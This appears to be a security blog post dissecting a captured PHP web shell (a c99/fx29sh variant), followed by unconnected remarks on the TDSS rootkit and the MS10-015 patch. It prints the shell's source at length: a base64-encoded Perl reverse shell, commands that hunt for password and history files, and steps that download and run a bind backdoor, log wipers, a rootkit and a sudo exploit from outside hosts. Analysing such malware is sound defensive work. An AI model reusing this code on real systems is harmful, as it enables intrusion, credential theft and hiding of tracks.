This one also looks juicy!

Another php,

<?php
$sh_id = “Q2FTcEVyX0thRUB5YWhPTy5jT20=”;
$sh_ver = “0.0 01.01.2010″;
$sh_name = base64_decode($sh_id).$sh_ver;
$sh_mainurl = “http://xxxxxx.ru/config/”;
$html_start = ”.
‘<html><head>
<title>’.getenv(“HTTP_HOST”).’ – ‘.$sh_name.’</title>
<style type=”text/css”>
<!–

What are you up to with this one?

We have lots of toys to play with.

//Authentication
$login = "";
$pass = "";
$md5_pass = ""; //Password yg telah di enkripsi dg md5. Jika kosong, md5($pass).
$host_allow = array("*"); //Contoh: array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted Area"; //Pesan HTTP-Auth
$accessdeniedmess = "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied";
$gzipencode = TRUE;
$updatenow = FALSE; //Jika TRUE, update shell sekarang.
$c99sh_updateurl = $sh_mainurl."fx29sh_update.php";
$c99sh_sourcesurl = $sh_mainurl."fx29sh_source.txt";
//$c99sh_updateurl = "http://localhost/toolz/fx29sh_update.php";
//$c99sh_sourcesurl = "http://localhost/toolz/fx29sh_source.txt";
$filestealth = TRUE; //TRUE, tidak merubah waktu modifikasi dan akses.
$curdir = "./";
$tmpdir = "";
$tmpdir_log = "./";
$log_email = "xxxxx_xxx@yahoo.com"; //email untuk pengiriman log.
$sort_default = "0a"; //Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
$sort_save = TRUE; //Jika TRUE, simpan posisi pengurutan menggunakan cookies.
$sess_cookie = "c99shvars"; //Nama variabel Cookie
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Hapus file yg telah di-copy setelah dipaste
$hexdump_lines = 8;
$hexdump_rows = 24;
$win = strtolower(substr(PHP_OS,0,3)) == "win";
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc)) {
  $disablefunc = str_replace(" ","",$disablefunc);
  $disablefunc = explode(",",$disablefunc);
}

A few functions on checking and reporting disk usage..

Now this is worth tracking down.

//milw0rm search
$Lversion = php_uname(r);
$OSV = php_uname(s);
if(eregi("Linux",$OSV)) {
  $Lversion=substr($Lversion,0,6);
  $millink="http://milw0rm.com/search.php?dong=Linux Kernel ".$Lversion;
} else {
  $Lversion=substr($Lversion,0,3);
  $millink ="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion;
}
//End of milw0rm search

I wish milw0rm was still around so we could see what those are for

Here is a few things that are encrypted.

$back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7
DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0k
QVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGll
KCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsN
CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+
JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3Rl
bSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4i
Ow0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";

And a few others, no point in sharing

We are sure reporting back for a lot of things.

  $cmdaliases = array(
    array("", "ls -al"),
    array("Find all suid files", "find / -type f -perm -04000 -ls"),
    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
    array("Find config* files", "find / -type f -name \"config*\""),
    array("Find config* files in current dir", "find . -type f -name \"config*\""),
    array("Find all writable folders and files", "find / -perm -2 -ls"),
    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
    array("Find all writable folders", "find / -type d -perm -2 -ls"),
    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
    array("Find all service.pwd files", "find / -type f -name service.pwd"),
    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
    array("Find all .bash_history files", "find / -type f -name .bash_history"),
    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
    array("List file attributes on a Linux second extended file system", "lsattr -va"),
    array("Show opened ports", "netstat -an | grep -i listen")
  );

OK now this is nice!

  $cmdaliases2 = array(
    array("wget & extract psyBNC","wget ".$sh_mainurl."fx.tar.gz;tar -zxf fx.tar.gz"),
    array("wget & extract EggDrop","wget ".$sh_mainurl."fxb.tar.gz;tar -zxf fxb.tar.gz"),
    array("-----",""),
    array("Logged in users","w"),
    array("Last to connect","lastlog"),
    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
    array("CPU Info","cat /proc/version /proc/cpuinfo"),
    array("Is gcc installed ?","locate gcc"),
    array("Format box (DANGEROUS)","rm -Rf"),
    array("-----",""),
    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
    array("Run WIPELOGS PT3","./zap2"),
    array("-----",""),
    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
    array("wget & run BindDoor","wget ".$sh_mainurl."toolz/bind.tar.gz;tar -zxvf bind.tar.gz;./4877"),
    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
  );

Looking for a few more things. We pull down some log wipers, from packetstorm, and grab RatHole 1.2 from the same place, and a local sudo exploit.

This is a big one, I will have to continue this tomorrow.

Now it’s going to be a race between system administrators to apply the MS10-015 to detect the root kit and the malware authors to update it so the patch won’t cause the system to blue screen and reveal the infection.

The number of reports of users having issues with the blue screen is surprising, cases like this are excellent reasons to have effective NIDS deployed.  Malware like Tdss needs to check in and when it does that it cannot hide anymore.

The full discussion is available here http://isc.sans.org/diary.html?storyid=8209#comment .